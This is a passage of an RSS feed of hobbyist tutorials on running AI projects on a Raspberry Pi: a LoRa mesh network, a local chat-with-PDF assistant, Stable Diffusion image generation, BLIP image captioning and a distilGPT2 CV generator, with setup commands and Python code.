&amp;nbsp;return "Normal message"&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Integrate into receive loop&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;msg = "".join(chr(b) for b in payload)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;print(analyze_message(msg))&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- NLP for Moderation: Filter spam or translate messages 
using lightweight models.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Run AI on boot: Use a systemd service to start scripts.&lt;br&gt;&lt;br&gt;&amp;nbsp;Step 4: User Interface and Deployment&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Build a Simple App:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Web-based UI: Use Flask on the Pi.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install flask&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;Create a dashboard for sending/receiving messages.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Mobile Integration: Pair with Bluetooth for smartphone access (use BlueZ on Pi).&lt;br&gt;&amp;nbsp; &amp;nbsp;- For end-users: Distribute ESP32-LoRa kits with a simple LCD/button interface.&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Network Deployment:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Place gateway Pis on high points (roofs, hills) for coverage.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Test range: Start with 2-3 nodes, send messages, measure latency.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Scale: Assign unique IDs to users.
Use encryption (e.g., AES via pycryptodome) for privacy.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Power Management: Enable sleep modes on LoRa for battery life.&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Testing and Optimization:&lt;br&gt;&amp;nbsp; &amp;nbsp;- Simulate 50-100 users: Use multiple virtual nodes or scripts to flood messages.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Monitor with AI: Implement anomaly detection to flag network issues.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Bandwidth: LoRa is low-data (~0.3-50 kbps), so limit traffic to text and short data.&lt;br&gt;&lt;br&gt;&amp;nbsp; Challenges and Considerations&lt;br&gt;- Regulatory Compliance: Ensure LoRa frequency use is legal in your area (e.g., FCC in US, ETSI in Europe).&lt;br&gt;- Security: Add authentication to prevent unauthorized access.&lt;br&gt;- Scalability Limits: For &amp;gt;100 users, consider a hybrid with Wi-Fi gateways.&lt;br&gt;- AI Performance: The Raspberry Pi 5 has no dedicated NPU, so heavy models may need optimization or offloading to a USB accelerator such as the Coral TPU.&lt;br&gt;- Maintenance: Remote SSH for updates; use a watchdog for reliability.&lt;br&gt;&lt;br&gt;&amp;nbsp;Conclusion&lt;br&gt;This AI-enhanced LoRa mesh network on Raspberry Pi 5 empowers small communities with resilient communication. By following these steps, you can prototype a node in a weekend and deploy a full network in weeks. Experiment, iterate, and share your improvements; open-source the code on GitHub for community benefit!&lt;/p&gt;</description>
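The relay rule from Step 3 (deliver if you are the destination, otherwise forward while capping hops at 3-5) is compact enough to sketch directly. The packet fields below are hypothetical and not the Meshtastic wire format:

```python
def handle_packet(packet, my_id, max_hops=5):
    """Decide what a mesh node does with an incoming packet:
    'deliver' it locally, 'relay' it onward with an incremented
    hop count, or 'drop' it once the hop limit is reached."""
    if packet["dest"] == my_id:
        return "deliver", packet
    if packet["hops"] >= max_hops:
        return "drop", packet          # hop cap keeps latency bounded
    relayed = dict(packet, hops=packet["hops"] + 1)
    return "relay", relayed
```

Keeping the hop counter inside the packet (rather than in node state) is what lets every node apply the same stateless rule, which matters when 10-20 gateways relay for 50-100 users.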
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/99/building-powered-raspberry-community-communication-villages</guid>
<pubDate>Sun, 07 Sep 2025 11:52:53 +0000</pubDate>
</item>
<item>
<title>Turn Your Raspberry Pi into a Chat-with-PDF AI Assistant</title>
<link>https://asky.uk/98/turn-your-raspberry-pi-into-a-chat-with-pdf-ai-assistant</link>
<description>&lt;hr&gt;&lt;h1&gt; Turn Your Raspberry Pi into a Chat-with-PDF AI Assistant&lt;/h1&gt;&lt;div&gt;&lt;img alt="" src="https://www.pdfgear.com/how-to/img/best-ai-to-chat-with-any-pdf-1.png" style="height:540px; width:900px"&gt;&lt;/div&gt;&lt;p&gt;The Raspberry Pi 5 is powerful enough to handle some surprisingly advanced AI tasks. Today, we’ll show you how to build a &lt;strong&gt;Chat-with-PDF Assistant&lt;/strong&gt; on your Pi — a local tool that lets you upload PDF files and ask questions about them using natural language, just like ChatGPT.&lt;/p&gt;&lt;p&gt;No need for the cloud. Everything runs &lt;strong&gt;locally&lt;/strong&gt; on your Raspberry Pi.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; What You’ll Build&lt;/h2&gt;&lt;p&gt;A local AI assistant that can:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Ingest PDF files&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Convert text to vector embeddings&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Accept questions in plain English&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Answer based on PDF contents&lt;br&gt;All without sending your documents to the cloud.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; What You’ll Need&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Raspberry Pi 5&lt;/strong&gt; (or Pi 4 with swap enabled)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;64-bit Raspberry Pi OS&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Python 3.9+&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;pip&lt;/strong&gt; and &lt;strong&gt;virtualenv&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;PDF document(s)&lt;/strong&gt; to test with&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Internet connection (initial setup only)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Step 1: Install Required Packages&lt;/h2&gt;&lt;p&gt;First, update your Pi and install basic dependencies:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; 
sudo apt upgrade -y
sudo apt install python3-pip python3-venv
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Create and activate a virtual environment:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;python3 -m venv pdfbot-env
source pdfbot-env/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now install the core Python libraries:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install --upgrade pip
pip install langchain faiss-cpu pypdf openai tiktoken
&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;Note:&lt;br&gt;The &lt;code&gt;openai&lt;/code&gt; route sends your text to OpenAI’s API. For the fully local setup described above, replace &lt;code&gt;openai&lt;/code&gt; with &lt;code&gt;llama-cpp-python&lt;/code&gt; or &lt;code&gt;transformers&lt;/code&gt;.&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h2&gt; Step 2: Load and Split Your PDF&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.document_loaders import PyPDFLoader
from langchain.text_splitter import CharacterTextSplitter

loader = PyPDFLoader("your_file.pdf")
pages = loader.load()

text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=200)
documents = text_splitter.split_documents(pages)
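# Why these numbers: chunk_size=1000 with chunk_overlap=200 means each new chunk
# starts roughly 800 characters after the previous one, so text that falls on a
# chunk boundary still appears intact in the neighbouring chunk. (The splitter
# actually breaks on separators, so real sizes vary.) Illustration with a
# hypothetical 2600-character page, pure arithmetic:
step = 1000 - 200
chunk_starts = list(range(0, 2600, step))  # [0, 800, 1600, 2400]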
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 3: Embed and Store Text&lt;/h2&gt;&lt;p&gt;Use FAISS to store searchable vectors:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.vectorstores import FAISS
from langchain.embeddings.openai import OpenAIEmbeddings

embedding = OpenAIEmbeddings()
db = FAISS.from_documents(documents, embedding)
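# Background sketch: FAISS stores one embedding vector per chunk and, at query
# time, returns the chunks whose vectors lie closest to the query's vector.
# Conceptually this is vector similarity; a stdlib-only illustration with
# made-up vectors (FAISS itself uses optimized index structures):
import math

def cosine_similarity(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)

# parallel vectors score 1.0, orthogonal vectors score 0.0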
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 4: Set Up the Chat Function&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from langchain.chains.question_answering import load_qa_chain
from langchain.llms import OpenAI

chain = load_qa_chain(OpenAI(), chain_type="stuff")

def ask(query):
    docs = db.similarity_search(query)
    answer = chain.run(input_documents=docs, question=query)
    return answer
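# Note on chain_type="stuff": every retrieved chunk is pasted into one prompt,
# so the combined size must fit the model's context window. A crude rule of
# thumb (assumption: roughly 4 characters per token for English text):
def approx_tokens(text):
    return len(text) // 4

# e.g. four 1000-character chunks cost roughly 1000 tokens of context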
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Example usage:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;print(ask("What does the report say about revenue growth in 2023?"))
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;Optional: Use a Local Model Instead of OpenAI&lt;/h2&gt;&lt;p&gt;Replace &lt;code&gt;OpenAI()&lt;/code&gt; with a local LLM served by &lt;code&gt;llama.cpp&lt;/code&gt;, or use an API like Ollama running on your Pi. Just swap out the &lt;code&gt;LLM&lt;/code&gt; passed to &lt;code&gt;load_qa_chain&lt;/code&gt;.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Final Notes&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;The Raspberry Pi 5 handles vector search and API queries easily.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Running LLM inference locally is RAM-intensive and may require &lt;strong&gt;swap files&lt;/strong&gt; or the &lt;strong&gt;8GB Pi variant&lt;/strong&gt;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For fully local use, combine with &lt;code&gt;llama.cpp&lt;/code&gt; and a local embedding model.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Summary&lt;/h2&gt;&lt;p&gt;You’ve now built a Chat-with-PDF Assistant that runs on your Raspberry Pi and can answer questions about any PDF you point it at. It’s private, fast, and extendable.&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/98/turn-your-raspberry-pi-into-a-chat-with-pdf-ai-assistant</guid>
<pubDate>Tue, 22 Jul 2025 06:47:24 +0000</pubDate>
</item>
<item>
<title>Run a Stable Diffusion Image Generator Locally on Raspberry Pi 5</title>
<link>https://asky.uk/97/run-stable-diffusion-image-generator-locally-on-raspberry</link>
<description>&lt;h2&gt;&lt;strong&gt;Run a Stable Diffusion Image Generator Locally on Raspberry Pi 5&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize:fit:1200/1*Rbq9cDCJpGq7HKeNAeIitg.jpeg" style="height:506px; width:900px"&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;Create stunning AI-generated images on your Pi — without internet!&lt;/em&gt;&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;️ Overview&lt;/h3&gt;&lt;p&gt;Stable Diffusion is a powerful open-source image generation model that turns &lt;strong&gt;text prompts&lt;/strong&gt; into &lt;strong&gt;photorealistic or artistic images&lt;/strong&gt;. While it's typically run on desktops with powerful GPUs, recent optimizations and the Raspberry Pi 5's performance improvements make it possible (with compromises) to run &lt;strong&gt;lightweight versions&lt;/strong&gt; of it &lt;strong&gt;locally&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;In this article, we’ll show you how to:&lt;/p&gt;&lt;p&gt;✅ Run a CPU-friendly version of Stable Diffusion on Raspberry Pi 5&lt;br&gt;✅ Generate images from text prompts&lt;br&gt;✅ Use Python and diffusers library from HuggingFace&lt;br&gt;✅ Work fully offline after setup&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;⚠️ &lt;em&gt;This guide uses a highly optimized model suited for CPU-only inference. 
Don’t expect real-time speed — but it works!&lt;/em&gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;hr&gt;&lt;h3&gt;Requirements&lt;/h3&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Component&lt;/th&gt;&lt;th&gt;Version / Notes&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Raspberry Pi&lt;/td&gt;&lt;td&gt;Pi 5 (8GB RAM strongly recommended)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;OS&lt;/td&gt;&lt;td&gt;Raspberry Pi OS Bookworm (64-bit)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Python&lt;/td&gt;&lt;td&gt;≥ 3.10&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Disk Space&lt;/td&gt;&lt;td&gt;~6 GB&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Internet&lt;/td&gt;&lt;td&gt;Only for installation and model download&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Model&lt;/td&gt;&lt;td&gt;Stable Diffusion 1.5 (CPU-optimized)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;hr&gt;&lt;h3&gt;Step 1: System Setup&lt;/h3&gt;&lt;pre&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3 python3-venv python3-pip -y
&lt;/pre&gt;&lt;p&gt;Create and activate a Python virtual environment:&lt;/p&gt;&lt;pre&gt;python3 -m venv sd-env
source sd-env/bin/activate
&lt;/pre&gt;&lt;hr&gt;&lt;h3&gt;Step 2: Install Required Python Libraries&lt;/h3&gt;&lt;pre&gt;pip install --upgrade pip
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cpu
pip install diffusers transformers accelerate scipy safetensors
&lt;/pre&gt;&lt;p&gt;We use the &lt;strong&gt;CPU-only version of PyTorch&lt;/strong&gt; to ensure compatibility with the Raspberry Pi’s hardware.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Step 3: Download a CPU-optimized Model&lt;/h3&gt;&lt;p&gt;Let’s use the runwayml/stable-diffusion-v1-5 model (or a smaller variant) from Hugging Face.&lt;/p&gt;&lt;p&gt;You can use this script to automatically load and save the model locally:&lt;/p&gt;&lt;pre&gt;from diffusers import StableDiffusionPipeline
import torch

pipeline = StableDiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5",
    torch_dtype=torch.float32,
)
pipeline = pipeline.to("cpu")

prompt = "A cyberpunk robot cat, neon background"
image = pipeline(prompt).images[0]
image.save("output.png")
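# Optional knobs (standard diffusers arguments; worth trying if runs feel slow):
#   pipeline.enable_attention_slicing()       # lowers peak RAM at a small speed cost
#   pipeline(prompt, num_inference_steps=25)  # default is 50; time scales roughly linearly
# Rough planning arithmetic: if 50 steps take ~10 minutes at 512x512, then
estimated_minutes = 10 * (25 / 50)  # 25 steps should take about 5 minutes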
&lt;/pre&gt;&lt;hr&gt;&lt;h3&gt;Tip: Use Smaller Models&lt;/h3&gt;&lt;p&gt;If your Pi struggles, try:&lt;/p&gt;&lt;pre&gt;from diffusers import DiffusionPipeline
pipe = DiffusionPipeline.from_pretrained("stabilityai/stable-diffusion-2-1-base")
&lt;/pre&gt;&lt;p&gt;Or explore other community checkpoints such as:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;CompVis/stable-diffusion-v1-4&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Linaqruf/stable-diffusion-1-5-better-vae&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;SG161222/Realistic_Vision_V5.1_noVAE&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h3&gt;How Long Does It Take?&lt;/h3&gt;&lt;p&gt;On Raspberry Pi 5 (8GB):&lt;/p&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Image Size&lt;/th&gt;&lt;th&gt;Inference Time&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;256x256&lt;/td&gt;&lt;td&gt;~2-4 minutes&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;512x512&lt;/td&gt;&lt;td&gt;~7-12 minutes&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;⚠️ Do &lt;strong&gt;not&lt;/strong&gt; expect desktop GPU speeds — but for low-volume, offline creative projects, it's functional.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Optional: Serve as a Web App with Gradio&lt;/h3&gt;&lt;pre&gt;pip install gradio
&lt;/pre&gt;&lt;p&gt;Add this to the script:&lt;/p&gt;&lt;pre&gt;import gradio as gr

def generate(prompt):
    image = pipeline(prompt).images[0]
    return image

gr.Interface(fn=generate, inputs="text", outputs="image").launch()
&lt;/pre&gt;&lt;p&gt;Access locally via http://localhost:7860&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Example Prompts&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;em&gt;“A medieval knight riding a dragon through the clouds”&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;em&gt;“A serene lake in the forest during sunset, ultra-realistic”&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h3&gt;Summary&lt;/h3&gt;&lt;p&gt;You’ve now turned your Raspberry Pi 5 into a &lt;strong&gt;local AI image generator&lt;/strong&gt; using Stable Diffusion. While it’s not lightning-fast, it’s fully offline, works with open-source tools, and gives you creative freedom at the edge.&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/97/run-stable-diffusion-image-generator-locally-on-raspberry</guid>
<pubDate>Sun, 20 Jul 2025 18:58:24 +0000</pubDate>
</item>
<item>
<title>Image Caption Generator using BLIP + PiCamera on Raspberry Pi</title>
<link>https://asky.uk/96/image-caption-generator-using-blip-picamera-on-raspberry-pi</link>
<description>&lt;h1&gt;️ Image Caption Generator using BLIP + PiCamera on Raspberry Pi&lt;/h1&gt;&lt;div&gt;&lt;img alt="" src="https://miro.medium.com/v2/resize:fit:1400/0*WeUeBnvELPwBQ7ff" style="height:238px; width:900px"&gt;&lt;/div&gt;&lt;p&gt;Turn your Raspberry Pi into a smart image captioning device using BLIP, an AI model that generates natural language descriptions of images.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Overview&lt;/h2&gt;&lt;p&gt;In this project, you will:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Capture images using the PiCamera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use the BLIP (Bootstrapped Language Image Pretraining) model to generate captions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Display or store the generated captions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Optionally build a simple web interface with Gradio&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This project works best with Raspberry Pi 4 or 5 and requires an internet connection (for downloading models or using APIs).&lt;/p&gt;&lt;hr&gt;&lt;h2&gt; Requirements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or 5 (Pi 3 will struggle with BLIP model inference)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS 64-bit (updated)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;PiCamera or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3.9+&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;pip and virtualenv&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Git&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt; Step 1: Install System Dependencies&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3-pip python3-venv libjpeg-dev libopenjp2-7-dev
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 2: Set Up Python Environment&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;mkdir ~/blip-caption
cd ~/blip-caption
python3 -m venv venv
source venv/bin/activate
pip install torch torchvision
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 3: Install HuggingFace Transformers and BLIP&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install transformers timm pillow
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 4: Capture Image with PiCamera&lt;/h2&gt;&lt;p&gt;If you're using the legacy PiCamera library (Pi 4 on older OS images only; on Raspberry Pi 5 and Bookworm, use the newer picamera2 library instead):&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install picamera
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;And use this code to capture an image:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from picamera import PiCamera
from time import sleep

camera = PiCamera()
camera.start_preview()
sleep(2)
camera.capture('image.jpg')
camera.stop_preview()
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;For USB camera, use OpenCV:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install opencv-python
&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import cv2
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
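# cap.read() returns (False, None) when no camera is available; this small guard
# (a hypothetical helper, not part of OpenCV) should be called before imwrite so
# you never try to save an empty frame:
def ensure_captured(ok):
    if not ok:
        raise RuntimeError("Camera capture failed - check the device index")
    return True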
cv2.imwrite('image.jpg', frame)
cap.release()
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Step 5: Generate Caption Using BLIP&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from transformers import BlipProcessor, BlipForConditionalGeneration
from PIL import Image
import torch

processor = BlipProcessor.from_pretrained("Salesforce/blip-image-captioning-base")
model = BlipForConditionalGeneration.from_pretrained("Salesforce/blip-image-captioning-base")

raw_image = Image.open("image.jpg").convert('RGB')
inputs = processor(raw_image, return_tensors="pt")
out = model.generate(**inputs)
caption = processor.decode(out[0], skip_special_tokens=True)
print("Caption:", caption)
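# Optional: persist each caption with a timestamp so repeated captures build a
# searchable log (the file name "captions.txt" is an arbitrary choice):
def log_caption(text, path="captions.txt"):
    from datetime import datetime
    with open(path, "a") as f:
        f.write(datetime.now().isoformat() + "\t" + text + "\n")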
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt; Optional: Add Gradio Interface&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install gradio
&lt;/code&gt;&lt;/pre&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import gradio as gr

def caption_image(image):
    inputs = processor(image, return_tensors="pt")
    out = model.generate(**inputs)
    return processor.decode(out[0], skip_special_tokens=True)

gr.Interface(fn=caption_image, inputs="image", outputs="text").launch()
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;&lt;h2&gt;✅ Conclusion&lt;/h2&gt;&lt;p&gt;You've built a working image caption generator using Raspberry Pi, PiCamera, and the BLIP AI model. You can now:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add automatic uploads or email integration&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Extend it into a surveillance or accessibility tool&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Use it in photo archiving projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/96/image-caption-generator-using-blip-picamera-on-raspberry-pi</guid>
<pubDate>Sun, 20 Jul 2025 11:21:30 +0000</pubDate>
</item>
<item>
<title>Build an AI Resume / CV Generator on Raspberry Pi</title>
<link>https://asky.uk/94/build-an-ai-resume-cv-generator-on-raspberry-pi</link>
<description>&lt;p&gt;One of the most requested AI tools today is an automatic CV or Resume Generator powered by language models. In this guide, we'll show you how to build one on a Raspberry Pi 4 using Python and Open Source models. This lightweight solution doesn't require paid API keys, and it can be deployed as a local or web-based app.&lt;/p&gt;&lt;h2&gt;Requirements&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 (4GB or 8GB RAM recommended)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS (Bookworm or Bullseye)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3.9+&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;pip (Python package manager)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Basic knowledge of Python and command line&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;(Optional) Flask or Gradio for Web Interface&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;Step 1: Update and Prepare Your Pi&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y
sudo apt install python3-pip git
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 2: Create Project Directory&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;mkdir ~/cv_generator &amp;amp;&amp;amp; cd ~/cv_generator
python3 -m venv venv
source venv/bin/activate
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 3: Install Required Libraries&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;pip install transformers gradio torch
&lt;/code&gt;&lt;/pre&gt;&lt;blockquote&gt;&lt;p&gt;On Raspberry Pi 4, Torch may take a while to install. Use &lt;code&gt;pip install torch==1.13.1&lt;/code&gt; if you face version issues.&lt;/p&gt;&lt;/blockquote&gt;&lt;h2&gt;Step 4: Choose a Small Language Model&lt;/h2&gt;&lt;p&gt;We'll use the lightweight &lt;a rel="nofollow" href="https://huggingface.co/distilgpt2"&gt;distilGPT2&lt;/a&gt; to generate CV content.&lt;/p&gt;&lt;pre&gt;&lt;code class="language-python"&gt;from transformers import pipeline

generator = pipeline("text-generation", model="distilgpt2")

def generate_cv(name, job_title):
    prompt = f"Create a professional resume for {name}, applying for a {job_title} position."
    result = generator(prompt, max_length=300, num_return_sequences=1)
    return result[0]['generated_text']
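# The text-generation pipeline echoes the prompt at the start of generated_text;
# this small helper (not part of transformers) strips it so only the generated
# CV body remains:
def strip_prompt(generated, prompt):
    if generated.startswith(prompt):
        return generated[len(prompt):].lstrip()
    return generated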
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 5: Add Gradio Interface&lt;/h2&gt;&lt;pre&gt;&lt;code class="language-python"&gt;import gradio as gr

def run_cv_gen(name, job):
    return generate_cv(name, job)

gr.Interface(fn=run_cv_gen,
             inputs=["text", "text"],
             outputs="text",
             title="AI CV Generator on Pi",
             description="Enter your name and job title to generate a sample CV.").launch()
&lt;/code&gt;&lt;/pre&gt;&lt;h2&gt;Step 6: Run the App&lt;/h2&gt;&lt;p&gt;Save the combined code from Steps 4 and 5 as &lt;code&gt;app.py&lt;/code&gt;, then run:&lt;/p&gt;&lt;pre&gt;&lt;code class="language-bash"&gt;python3 app.py
